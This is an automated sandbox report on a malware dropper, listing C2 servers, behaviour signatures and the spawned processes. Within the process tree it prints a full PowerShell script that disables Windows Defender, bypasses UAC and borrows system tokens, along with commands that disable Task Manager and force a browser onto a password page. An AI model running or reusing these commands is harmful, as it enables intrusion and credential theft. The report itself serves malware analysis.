Analysis

  • max time kernel
    143s
  • max time network
    151s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20241007-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
  • submitted
    10-12-2024 15:06

General

  • Target

    d7ee4d77ecce5c664aa43efa81cfc94981b1db50195ec415c4f8782322bc9fd3.exe

  • Size

    3.1MB

  • MD5

    f8018bbe2183b62993997b8f62c299da

  • SHA1

    dad03527414a7d258cf7e3436f7d3712b80594f9

  • SHA256

    d7ee4d77ecce5c664aa43efa81cfc94981b1db50195ec415c4f8782322bc9fd3

  • SHA512

    5a5f0512046f219a471731c3e548dab7d3ddb861e302f35a9961776578a31a3ca08b27e8f728027e5c4246fe7285eceb1da553f36ebcd4d7e4d299f54692134b

  • SSDEEP

    49152:uSySqgVOLFJJZDlLWJFV+F5UG8zXaRngzfE/:uCqN5JJZDlLWJ7+UG8zqR

Malware Config

Extracted

Family

amadey

Version

4.42

Botnet

9c9aa5

C2

http://185.215.113.43

Attributes
  • install_dir

    abc3bc1985

  • install_file

    skotes.exe

  • strings_key

    8a35cf2ea38c2817dba29a4b5b25dcf0

  • url_paths

    /Zu7JuNko/index.php

rc4.plain

Extracted

Family

asyncrat

Version

Venom RAT + HVNC + Stealer + Grabber v6.0.3

Botnet

Default

C2

205.209.109.10:4449

205.209.109.10:7723

Mutex

clgbfqzkkypxjps

Attributes
  • delay

    1

  • install

    false

  • install_folder

    %AppData%

aes.plain

Extracted

Family

lumma

C2

https://impend-differ.biz/api

https://print-vexer.biz/api

https://dare-curbys.biz/api

https://covery-mover.biz/api

https://formy-spill.biz/api

https://dwell-exclaim.biz/api

https://zinc-sneark.biz/api

https://se-blurry.biz/api

https://atten-supporse.biz/api

Extracted

Family

stealc

Botnet

stok

C2

http://185.215.113.206

Attributes
  • url_path

    /c4becf79229cb002.php

Extracted

Family

lumma

C2

https://atten-supporse.biz/api

https://covery-mover.biz/api

Signatures

  • Amadey

    Amadey bot is a simple trojan bot primarily used for collecting reconnaissance information.

  • Amadey family
  • AsyncRat

    AsyncRAT is designed to remotely monitor and control other computers written in C#.

  • Asyncrat family
  • GCleaner

    GCleaner is a Pay-Per-Install malware loader first discovered in early 2019.

  • Gcleaner family
  • Lumma Stealer, LummaC

    Lumma or LummaC is an infostealer written in C++ first seen in August 2022.

  • Lumma family
  • Modifies Windows Defender Real-time Protection settings 3 TTPs 6 IoCs
  • Stealc

    Stealc is an infostealer written in C++.

  • Stealc family
  • StormKitty

    StormKitty is an open source info stealer written in C#.

  • StormKitty payload 1 IoCs
  • Stormkitty family
  • Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
  • Async RAT payload 3 IoCs
  • Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 9 IoCs
  • Disables Task Manager via registry modification
  • Downloads MZ/PE file
  • Checks BIOS information in registry 2 TTPs 18 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Checks computer location settings 2 TTPs 6 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Executes dropped EXE 12 IoCs
  • Identifies Wine through registry keys 2 TTPs 9 IoCs

    Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.

  • Reads user/profile data of web browsers 3 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Windows security modification 2 TTPs 2 IoCs
  • Adds Run key to start application 2 TTPs 4 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

    Using powershell.exe command.

  • AutoIT Executable 1 IoCs

    AutoIT scripts compiled to PE executables.

  • Suspicious use of NtSetInformationThreadHideFromDebugger 9 IoCs
  • Drops file in Program Files directory 7 IoCs
  • Drops file in Windows directory 2 IoCs
  • Launches sc.exe 3 IoCs

    Sc.exe is a Windows utlilty to control services on the system.

  • Browser Information Discovery 1 TTPs

    Enumerate browser information.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Program crash 2 IoCs
  • System Location Discovery: System Language Discovery 1 TTPs 30 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Checks processor information in registry 2 TTPs 8 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Kills process with taskkill 5 IoCs
  • Modifies data under HKEY_USERS 46 IoCs
  • Modifies registry class 3 IoCs
  • Modifies registry key 1 TTPs 1 IoCs
  • Runs net.exe
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious use of AdjustPrivilegeToken 59 IoCs
  • Suspicious use of FindShellTrayWindow 34 IoCs
  • Suspicious use of SendNotifyMessage 32 IoCs
  • Suspicious use of SetWindowsHookEx 2 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

Processes

  • C:\Users\Admin\AppData\Local\Temp\d7ee4d77ecce5c664aa43efa81cfc94981b1db50195ec415c4f8782322bc9fd3.exe
    "C:\Users\Admin\AppData\Local\Temp\d7ee4d77ecce5c664aa43efa81cfc94981b1db50195ec415c4f8782322bc9fd3.exe"
    1⤵
    • Identifies VirtualBox via ACPI registry values (likely anti-VM)
    • Checks BIOS information in registry
    • Checks computer location settings
    • Identifies Wine through registry keys
    • Suspicious use of NtSetInformationThreadHideFromDebugger
    • Drops file in Windows directory
    • System Location Discovery: System Language Discovery
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of FindShellTrayWindow
    • Suspicious use of WriteProcessMemory
    PID:1216
    • C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe
      "C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe"
      2⤵
      • Identifies VirtualBox via ACPI registry values (likely anti-VM)
      • Checks BIOS information in registry
      • Checks computer location settings
      • Executes dropped EXE
      • Identifies Wine through registry keys
      • Adds Run key to start application
      • Suspicious use of NtSetInformationThreadHideFromDebugger
      • System Location Discovery: System Language Discovery
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of WriteProcessMemory
      PID:384
      • C:\Users\Admin\AppData\Local\Temp\1013675001\H3tyh96.exe
        "C:\Users\Admin\AppData\Local\Temp\1013675001\H3tyh96.exe"
        3⤵
        • Identifies VirtualBox via ACPI registry values (likely anti-VM)
        • Checks BIOS information in registry
        • Checks computer location settings
        • Executes dropped EXE
        • Identifies Wine through registry keys
        • Suspicious use of NtSetInformationThreadHideFromDebugger
        • System Location Discovery: System Language Discovery
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of SetWindowsHookEx
        • Suspicious use of WriteProcessMemory
        PID:2632
        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc @ ( e c h o   o f f % ) [ 1 ]  
 s p   ' H K C U : \ V o l a t i l e   E n v i r o n m e n t '   ' T o g g l e D e f e n d e r '   @ '  
 i f   ( $ ( s c . e x e   q c   w i n d e f e n d )   - l i k e   ' * T O G G L E * ' )   { $ T O G G L E = 7 ; $ K E E P = 6 ; $ A = ' E n a b l e ' ; $ S = ' O F F ' } e l s e { $ T O G G L E = 6 ; $ K E E P = 7 ; $ A = ' D i s a b l e ' ; $ S = ' O N ' }  
  
 i f   ( $ e n v : 1   - n e   6   - a n d   $ e n v : 1   - n e   7 )   {   $ e n v : 1 = $ T O G G L E   }  
  
 s t a r t   c m d   - a r g s   ' / d / r   S e c u r i t y H e a l t h S y s t r a y   &   " % P r o g r a m F i l e s % \ W i n d o w s   D e f e n d e r \ M S A S C u i L . e x e " '   - w i n   1  
  
 $ n o t i f = ' H K C U : \ S O F T W A R E \ M i c r o s o f t \ W i n d o w s \ C u r r e n t V e r s i o n \ N o t i f i c a t i o n s \ S e t t i n g s \ W i n d o w s . S y s t e m T o a s t . S e c u r i t y A n d M a i n t e n a n c e '  
 n i   $ n o t i f   - e a   0 | o u t - n u l l ;   r i   $ n o t i f . r e p l a c e ( ' S e t t i n g s ' , ' C u r r e n t ' )   - R e c u r s e   - F o r c e   - e a   0  
 s p   $ n o t i f   E n a b l e d   0   - T y p e   D w o r d   - F o r c e   - e a   0 ;   i f   ( $ T O G G L E   - e q   7 )   { r p   $ n o t i f   E n a b l e d   - F o r c e   - e a   0 }  
  
 $ t s = N e w - O b j e c t   - C o m O b j e c t   ' S c h e d u l e . S e r v i c e ' ;   $ t s . C o n n e c t ( ) ;   $ b a f f l i n g = $ t s . G e t F o l d e r ( ' \ M i c r o s o f t \ W i n d o w s \ D i s k C l e a n u p ' )  
 $ b p a s s = $ b a f f l i n g . G e t T a s k ( ' S i l e n t C l e a n u p ' ) ;   $ f l a w = $ b p a s s . D e f i n i t i o n  
  
 $ u = 0 ; $ w = w h o a m i   / g r o u p s ; i f ( $ w - l i k e ' * 1 - 5 - 3 2 - 5 4 4 * ' ) { $ u = 1 } ; i f ( $ w - l i k e ' * 1 - 1 6 - 1 2 2 8 8 * ' ) { $ u = 2 } ; i f ( $ w - l i k e ' * 1 - 1 6 - 1 6 3 8 4 * ' ) { $ u = 3 }  
  
 $ r = [ c h a r ] 1 3 ;   $ n f o = [ c h a r ] 3 9 + $ r + '   ( \       / ) ' + $ r + ' (   *   .   *   )     A   l i m i t e d   a c c o u n t   p r o t e c t s   y o u   f r o m   U A C   e x p l o i t s ' + $ r + '         ` ` ` ' + $ r + [ c h a r ] 3 9  
 $ s c r i p t = ' - n o p   - w i n   1   - c   &   { r p   h k c u : \ e n v i r o n m e n t   w i n d i r   - e a   0 ; $ A v e Y o = ' + $ n f o + ' ; $ e n v : 1 = ' + $ e n v : 1 ;   $ e n v : _ _ C O M P A T _ L A Y E R = ' I n s t a l l e r '  
 $ s c r i p t + = ' ; i e x ( ( g p   R e g i s t r y : : H K E Y _ U s e r s \ S - 1 - 5 - 2 1 * \ V o l a t i l e *   T o g g l e D e f e n d e r   - e a   0 ) [ 0 ] . T o g g l e D e f e n d e r ) } ' ;   $ c m d = ' p o w e r s h e l l   ' + $ s c r i p t  
  
 i f   ( $ u   - e q   0 )   {  
     s t a r t   p o w e r s h e l l   - a r g s   $ s c r i p t   - v e r b   r u n a s   - w i n   1 ;   b r e a k  
 }  
 i f   ( $ u   - e q   1 )   {  
     i f   ( $ f l a w . A c t i o n s . I t e m ( 1 ) . P a t h   - i n o t l i k e   ' * w i n d i r * ' ) { s t a r t   p o w e r s h e l l   - a r g s   $ s c r i p t   - v e r b   r u n a s   - w i n   1 ;   b r e a k }  
     s p   h k c u : \ e n v i r o n m e n t   w i n d i r   $ ( ' p o w e r s h e l l   ' + $ s c r i p t + '   # ' )  
     $ z = $ b p a s s . R u n E x ( $ n u l l , 2 , 0 , $ n u l l ) ;   $ w a i t = 0 ;   w h i l e ( $ b p a s s . S t a t e   - g t   3   - a n d   $ w a i t   - l t   1 7 ) { s l e e p   - m   1 0 0 ;   $ w a i t + = 0 . 1 }  
     i f ( g p   h k c u : \ e n v i r o n m e n t   w i n d i r   - e a   0 ) { r p   h k c u : \ e n v i r o n m e n t   w i n d i r   - e a   0 ; s t a r t   p o w e r s h e l l   - a r g s   $ s c r i p t   - v e r b   r u n a s   - w i n   1 } ; b r e a k  
 }  
 i f   ( $ u   - e q   2 )   {  
     $ A = [ A p p D o m a i n ] : : C u r r e n t D o m a i n . " D e f ` i n e D y n a m i c A s s e m b l y " ( 1 , 1 ) . " D e f ` i n e D y n a m i c M o d u l e " ( 1 ) ; $ D = @ ( ) ; 0 . . 5 | % { $ D + = $ A . " D e f ` i n e T y p e " ( ' A ' + $ _ ,  
     1 1 7 9 9 1 3 , [ V a l u e T y p e ] ) }   ; 4 , 5 | % { $ D + = $ D [ $ _ ] . " M a k ` e B y R e f T y p e " ( ) }   ; $ I = [ I n t 3 2 ] ; $ J = " I n t ` P t r " ; $ P = $ I . m o d u l e . G e t T y p e ( " S y s t e m . $ J " ) ;   $ F = @ ( 0 )  
     $ F + = ( $ P , $ I , $ P ) , ( $ I , $ I , $ I , $ I , $ P , $ D [ 1 ] ) , ( $ I , $ P , $ P , $ P , $ I , $ I , $ I , $ I , $ I , $ I , $ I , $ I , [ I n t 1 6 ] , [ I n t 1 6 ] , $ P , $ P , $ P , $ P ) , ( $ D [ 3 ] , $ P ) , ( $ P , $ P , $ I , $ I )  
     $ S = [ S t r i n g ] ;   $ 9 = $ D [ 0 ] . " D e f ` i n e P I n v o k e M e t h o d " ( ' C r e a t e P r o c e s s ' , " k e r n e l ` 3 2 " , 8 2 1 4 , 1 , $ I , @ ( $ S , $ S , $ I , $ I , $ I , $ I , $ I , $ S , $ D [ 6 ] , $ D [ 7 ] ) , 1 , 4 )  
     1 . . 5 | % { $ k = $ _ ; $ n = 1 ; $ F [ $ _ ] | % { $ 9 = $ D [ $ k ] . " D e f ` i n e F i e l d " ( ' f ' + $ n + + , $ _ , 6 ) } } ; $ T = @ ( ) ; 0 . . 5 | % { $ T + = $ D [ $ _ ] . " C r ` e a t e T y p e " ( ) ; $ Z = [ u i n t p t r ] : : s i z e  
     n v   ( ' T ' + $ _ ) ( [ A c t i v a t o r ] : : C r e a t e I n s t a n c e ( $ T [ $ _ ] ) ) } ;   $ H = $ I . m o d u l e . G e t T y p e ( " S y s t e m . R u n t i m e . I n t e r o p ` S e r v i c e s . M a r ` s h a l " ) ;  
     $ W P = $ H . " G e t ` M e t h o d " ( " W r i t e $ J " , [ t y p e [ ] ] ( $ J , $ J ) ) ;   $ H G = $ H . " G e t ` M e t h o d " ( " A l l o c H ` G l o b a l " , [ t y p e [ ] ] ' i n t 3 2 ' ) ;   $ v = $ H G . i n v o k e ( $ n u l l , $ Z )  
     ' T r u s t e d I n s t a l l e r ' , ' l s a s s ' | % { i f ( ! $ p n ) { n e t 1   s t a r t   $ _   2 > & 1   > $ n u l l ; $ p n = [ D i a g n o s t i c s . P r o c e s s ] : : G e t P r o c e s s e s B y N a m e ( $ _ ) [ 0 ] ; } }  
     $ W P . i n v o k e ( $ n u l l , @ ( $ v , $ p n . H a n d l e ) ) ;   $ S Z = $ H . " G e t ` M e t h o d " ( " S i z e O f " , [ t y p e [ ] ] ' t y p e ' ) ;   $ T 1 . f 1 = 1 3 1 0 7 2 ;   $ T 1 . f 2 = $ Z ;   $ T 1 . f 3 = $ v ;   $ T 2 . f 1 = 1  
     $ T 2 . f 2 = 1 ; $ T 2 . f 3 = 1 ; $ T 2 . f 4 = 1 ; $ T 2 . f 6 = $ T 1 ; $ T 3 . f 1 = $ S Z . i n v o k e ( $ n u l l , $ T [ 4 ] ) ; $ T 4 . f 1 = $ T 3 ; $ T 4 . f 2 = $ H G . i n v o k e ( $ n u l l , $ S Z . i n v o k e ( $ n u l l , $ T [ 2 ] ) )  
     $ H . " G e t ` M e t h o d " ( " S t r u c t u r e T o ` P t r " , [ t y p e [ ] ] ( $ D [ 2 ] , $ J , ' b o o l e a n ' ) ) . i n v o k e ( $ n u l l , @ ( ( $ T 2 - a s   $ D [ 2 ] ) , $ T 4 . f 2 , $ f a l s e ) ) ; $ w i n d o w = 0 x 0 E 0 8 0 6 0 0  
     $ 9 = $ T [ 0 ] . " G e t ` M e t h o d " ( ' C r e a t e P r o c e s s ' ) . I n v o k e ( $ n u l l , @ ( $ n u l l , $ c m d , 0 , 0 , 0 , $ w i n d o w , 0 , $ n u l l , ( $ T 4 - a s   $ D [ 4 ] ) , ( $ T 5 - a s   $ D [ 5 ] ) ) ) ;   b r e a k  
 }  
  
 $ w d p = ' H K L M : \ S O F T W A R E \ P o l i c i e s \ M i c r o s o f t \ W i n d o w s   D e f e n d e r '  
 '   S e c u r i t y   C e n t e r \ N o t i f i c a t i o n s ' , ' \ U X   C o n f i g u r a t i o n ' , ' \ M p E n g i n e ' , ' \ S p y n e t ' , ' \ R e a l - T i m e   P r o t e c t i o n '   | %   { n i   ( $ w d p + $ _ ) - e a   0 | o u t - n u l l }  
  
 s p   ' H K L M : \ S O F T W A R E \ P o l i c i e s \ M i c r o s o f t \ W i n d o w s   D e f e n d e r   S e c u r i t y   C e n t e r \ N o t i f i c a t i o n s '   D i s a b l e N o t i f i c a t i o n s   1   - T y p e   D w o r d   - e a   0  
 s p   ' H K L M : \ S O F T W A R E \ P o l i c i e s \ M i c r o s o f t \ W i n d o w s   D e f e n d e r \ U X   C o n f i g u r a t i o n '   N o t i f i c a t i o n _ S u p p r e s s   1   - T y p e   D w o r d   - F o r c e   - e a   0  
 s p   ' H K L M : \ S O F T W A R E \ M i c r o s o f t \ W i n d o w s   D e f e n d e r   S e c u r i t y   C e n t e r \ N o t i f i c a t i o n s '   D i s a b l e N o t i f i c a t i o n s   1   - T y p e   D w o r d   - e a   0  
 s p   ' H K L M : \ S O F T W A R E \ M i c r o s o f t \ W i n d o w s   D e f e n d e r \ U X   C o n f i g u r a t i o n '   N o t i f i c a t i o n _ S u p p r e s s   1   - T y p e   D w o r d   - F o r c e   - e a   0  
 s p   ' H K L M : \ S O F T W A R E \ P o l i c i e s \ M i c r o s o f t \ W i n d o w s \ S y s t e m '   E n a b l e S m a r t S c r e e n   0   - T y p e   D w o r d   - F o r c e   - e a   0  
 s p   ' H K L M : \ S O F T W A R E \ P o l i c i e s \ M i c r o s o f t \ W i n d o w s   D e f e n d e r '   D i s a b l e A n t i S p y w a r e   1   - T y p e   D w o r d   - F o r c e   - e a   0  
 s p   ' H K L M : \ S O F T W A R E \ M i c r o s o f t \ W i n d o w s   D e f e n d e r '   D i s a b l e A n t i S p y w a r e   1   - T y p e   D w o r d   - F o r c e   - e a   0  
 n e t 1   s t o p   w i n d e f e n d  
 s c . e x e   c o n f i g   w i n d e f e n d   d e p e n d =   R p c S s - T O G G L E  
 k i l l   - N a m e   M p C m d R u n   - F o r c e   - e a   0  
 s t a r t   ( $ e n v : P r o g r a m F i l e s + ' \ W i n d o w s   D e f e n d e r \ M p C m d R u n . e x e ' )   - A r g   ' - D i s a b l e S e r v i c e '   - w i n   1  
 d e l   ( $ e n v : P r o g r a m D a t a + ' \ M i c r o s o f t \ W i n d o w s   D e f e n d e r \ S c a n s \ m p e n g i n e d b . d b ' )   - F o r c e   - e a   0                       # #   C o m m e n t e d   =   k e e p   s c a n   h i s t o r y  
 d e l   ( $ e n v : P r o g r a m D a t a + ' \ M i c r o s o f t \ W i n d o w s   D e f e n d e r \ S c a n s \ H i s t o r y \ S e r v i c e ' )   - R e c u r s e   - F o r c e   - e a   0  
 ' @   - F o r c e   - e a   0 ;   i e x ( ( g p   R e g i s t r y : : H K E Y _ U s e r s \ S - 1 - 5 - 2 1 * \ V o l a t i l e *   T o g g l e D e f e n d e r   - e a   0 ) [ 0 ] . T o g g l e D e f e n d e r )  
 # - _ - # 
          4⤵
          • Suspicious use of NtCreateUserProcessOtherParentProcess
          • System Location Discovery: System Language Discovery
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:1216
          • C:\Windows\SysWOW64\sc.exe
            "C:\Windows\system32\sc.exe" qc windefend
            5⤵
            • Launches sc.exe
            • System Location Discovery: System Language Discovery
            PID:1776
          • C:\Windows\SysWOW64\cmd.exe
            "C:\Windows\system32\cmd.exe" /d/r SecurityHealthSystray & "%ProgramFiles%\Windows Defender\MSASCuiL.exe"
            5⤵
            • System Location Discovery: System Language Discovery
            PID:4640
          • C:\Windows\SysWOW64\whoami.exe
            "C:\Windows\system32\whoami.exe" /groups
            5⤵
            • System Location Discovery: System Language Discovery
            • Suspicious use of AdjustPrivilegeToken
            PID:596
          • C:\Windows\SysWOW64\net1.exe
            "C:\Windows\system32\net1.exe" start TrustedInstaller
            5⤵
            • System Location Discovery: System Language Discovery
            PID:2104
        • C:\Windows\SysWOW64\WerFault.exe
          C:\Windows\SysWOW64\WerFault.exe -u -p 2632 -s 3332
          4⤵
          • Program crash
          PID:3304
      • C:\Users\Admin\AppData\Local\Temp\1013725001\UkYEOVR.exe
        "C:\Users\Admin\AppData\Local\Temp\1013725001\UkYEOVR.exe"
        3⤵
        • Checks computer location settings
        • Executes dropped EXE
        • System Location Discovery: System Language Discovery
        • Modifies registry class
        • Suspicious use of WriteProcessMemory
        PID:3540
        • C:\Windows\SysWOW64\WScript.exe
          "C:\Windows\System32\WScript.exe" "C:\dllnet\yLU75wsHgukerTkv.vbe"
          4⤵
          • Checks computer location settings
          • System Location Discovery: System Language Discovery
          • Suspicious use of WriteProcessMemory
          PID:1324
          • C:\Windows\SysWOW64\cmd.exe
            C:\Windows\system32\cmd.exe /c ""C:\dllnet\J0k4As.bat" "
            5⤵
            • System Location Discovery: System Language Discovery
            • Suspicious use of WriteProcessMemory
            PID:4132
            • C:\Windows\SysWOW64\reg.exe
              reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f
              6⤵
              • System Location Discovery: System Language Discovery
              • Modifies registry key
              PID:1732
            • C:\dllnet\HyperServerFontdll.exe
              "C:\dllnet/HyperServerFontdll.exe"
              6⤵
              • Checks computer location settings
              • Executes dropped EXE
              • Drops file in Program Files directory
              • Drops file in Windows directory
              • Modifies registry class
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              • Suspicious use of WriteProcessMemory
              PID:4808
              • C:\Windows\System32\cmd.exe
                "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\v63keZlD5I.bat"
                7⤵
                  PID:4156
                  • C:\Windows\system32\chcp.com
                    chcp 65001
                    8⤵
                      PID:888
                    • C:\Windows\system32\w32tm.exe
                      w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
                      8⤵
                        PID:1768
                      • C:\Users\Public\Music\winlogon.exe
                        "C:\Users\Public\Music\winlogon.exe"
                        8⤵
                        • Executes dropped EXE
                        • Suspicious use of AdjustPrivilegeToken
                        PID:4360
            • C:\Users\Admin\AppData\Local\Temp\1013735001\f138def07d.exe
              "C:\Users\Admin\AppData\Local\Temp\1013735001\f138def07d.exe"
              3⤵
              • Identifies VirtualBox via ACPI registry values (likely anti-VM)
              • Checks BIOS information in registry
              • Executes dropped EXE
              • Identifies Wine through registry keys
              • Suspicious use of NtSetInformationThreadHideFromDebugger
              • System Location Discovery: System Language Discovery
              • Suspicious behavior: EnumeratesProcesses
              PID:2832
              • C:\Windows\SysWOW64\WerFault.exe
                C:\Windows\SysWOW64\WerFault.exe -u -p 2832 -s 1480
                4⤵
                • Program crash
                PID:3992
            • C:\Users\Admin\AppData\Local\Temp\1013736001\c92de24d75.exe
              "C:\Users\Admin\AppData\Local\Temp\1013736001\c92de24d75.exe"
              3⤵
              • Identifies VirtualBox via ACPI registry values (likely anti-VM)
              • Checks BIOS information in registry
              • Executes dropped EXE
              • Identifies Wine through registry keys
              • Suspicious use of NtSetInformationThreadHideFromDebugger
              • System Location Discovery: System Language Discovery
              • Suspicious behavior: EnumeratesProcesses
              PID:2164
            • C:\Users\Admin\AppData\Local\Temp\1013737001\5a5b5e6249.exe
              "C:\Users\Admin\AppData\Local\Temp\1013737001\5a5b5e6249.exe"
              3⤵
              • Identifies VirtualBox via ACPI registry values (likely anti-VM)
              • Checks BIOS information in registry
              • Executes dropped EXE
              • Identifies Wine through registry keys
              • Suspicious use of NtSetInformationThreadHideFromDebugger
              • System Location Discovery: System Language Discovery
              • Suspicious behavior: EnumeratesProcesses
              PID:3592
            • C:\Users\Admin\AppData\Local\Temp\1013738001\9b2bbd9be9.exe
              "C:\Users\Admin\AppData\Local\Temp\1013738001\9b2bbd9be9.exe"
              3⤵
              • Executes dropped EXE
              • System Location Discovery: System Language Discovery
              • Suspicious use of FindShellTrayWindow
              • Suspicious use of SendNotifyMessage
              PID:4996
              • C:\Windows\SysWOW64\taskkill.exe
                taskkill /F /IM firefox.exe /T
                4⤵
                • System Location Discovery: System Language Discovery
                • Kills process with taskkill
                • Suspicious use of AdjustPrivilegeToken
                PID:1528
              • C:\Windows\SysWOW64\taskkill.exe
                taskkill /F /IM chrome.exe /T
                4⤵
                • System Location Discovery: System Language Discovery
                • Kills process with taskkill
                • Suspicious use of AdjustPrivilegeToken
                PID:2576
              • C:\Windows\SysWOW64\taskkill.exe
                taskkill /F /IM msedge.exe /T
                4⤵
                • System Location Discovery: System Language Discovery
                • Kills process with taskkill
                • Suspicious use of AdjustPrivilegeToken
                PID:2976
              • C:\Windows\SysWOW64\taskkill.exe
                taskkill /F /IM opera.exe /T
                4⤵
                • System Location Discovery: System Language Discovery
                • Kills process with taskkill
                • Suspicious use of AdjustPrivilegeToken
                PID:3032
              • C:\Windows\SysWOW64\taskkill.exe
                taskkill /F /IM brave.exe /T
                4⤵
                • System Location Discovery: System Language Discovery
                • Kills process with taskkill
                • Suspicious use of AdjustPrivilegeToken
                PID:4212
              • C:\Program Files\Mozilla Firefox\firefox.exe
                "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk "https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd" --no-default-browser-check --disable-popup-blocking
                4⤵
                  PID:4928
                  • C:\Program Files\Mozilla Firefox\firefox.exe
                    "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd --no-default-browser-check --disable-popup-blocking
                    5⤵
                    • Checks processor information in registry
                    • Modifies registry class
                    • Suspicious use of AdjustPrivilegeToken
                    • Suspicious use of FindShellTrayWindow
                    • Suspicious use of SendNotifyMessage
                    • Suspicious use of SetWindowsHookEx
                    PID:3148
                    • C:\Program Files\Mozilla Firefox\firefox.exe
                      "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=1928 -parentBuildID 20240401114208 -prefsHandle 1844 -prefMapHandle 1836 -prefsLen 23680 -prefMapSize 244658 -appDir "C:\Program Files\Mozilla Firefox\browser" - {a0acc296-efdd-412c-9413-554cc5ff5093} 3148 "\\.\pipe\gecko-crash-server-pipe.3148" gpu
                      6⤵
                        PID:3696
                      • C:\Program Files\Mozilla Firefox\firefox.exe
                        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2420 -parentBuildID 20240401114208 -prefsHandle 2412 -prefMapHandle 2408 -prefsLen 24600 -prefMapSize 244658 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {180d1d45-6b13-49c5-858b-b281bb9d5b24} 3148 "\\.\pipe\gecko-crash-server-pipe.3148" socket
                        6⤵
                          PID:4892
                        • C:\Program Files\Mozilla Firefox\firefox.exe
                          "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=3024 -childID 1 -isForBrowser -prefsHandle 2912 -prefMapHandle 3036 -prefsLen 22652 -prefMapSize 244658 -jsInitHandle 892 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {dc31e5e3-e860-4cb7-b529-efc4599d3254} 3148 "\\.\pipe\gecko-crash-server-pipe.3148" tab
                          6⤵
                            PID:692
                          • C:\Program Files\Mozilla Firefox\firefox.exe
                            "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2544 -childID 2 -isForBrowser -prefsHandle 1232 -prefMapHandle 2560 -prefsLen 29090 -prefMapSize 244658 -jsInitHandle 892 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {24717f92-f5e1-4e1b-b77c-8200e10d6e8a} 3148 "\\.\pipe\gecko-crash-server-pipe.3148" tab
                            6⤵
                              PID:4684
                            • C:\Program Files\Mozilla Firefox\firefox.exe
                              "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=4740 -parentBuildID 20240401114208 -sandboxingKind 0 -prefsHandle 4884 -prefMapHandle 4880 -prefsLen 29090 -prefMapSize 244658 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {79148f87-706e-4dd4-95de-829625379c96} 3148 "\\.\pipe\gecko-crash-server-pipe.3148" utility
                              6⤵
                              • Checks processor information in registry
                              PID:5616
                            • C:\Program Files\Mozilla Firefox\firefox.exe
                              "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5484 -childID 3 -isForBrowser -prefsHandle 5268 -prefMapHandle 5420 -prefsLen 27132 -prefMapSize 244658 -jsInitHandle 892 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {1c56363e-2419-4326-b322-9a4a95d911eb} 3148 "\\.\pipe\gecko-crash-server-pipe.3148" tab
                              6⤵
                                PID:5236
                              • C:\Program Files\Mozilla Firefox\firefox.exe
                                "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5612 -childID 4 -isForBrowser -prefsHandle 5620 -prefMapHandle 5624 -prefsLen 27132 -prefMapSize 244658 -jsInitHandle 892 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {e021c121-45ed-44a2-8d39-dd647c741905} 3148 "\\.\pipe\gecko-crash-server-pipe.3148" tab
                                6⤵
                                  PID:5252
                                • C:\Program Files\Mozilla Firefox\firefox.exe
                                  "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5816 -childID 5 -isForBrowser -prefsHandle 5896 -prefMapHandle 5892 -prefsLen 27132 -prefMapSize 244658 -jsInitHandle 892 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {49f80322-8a65-44c3-a441-6a14f9a284f6} 3148 "\\.\pipe\gecko-crash-server-pipe.3148" tab
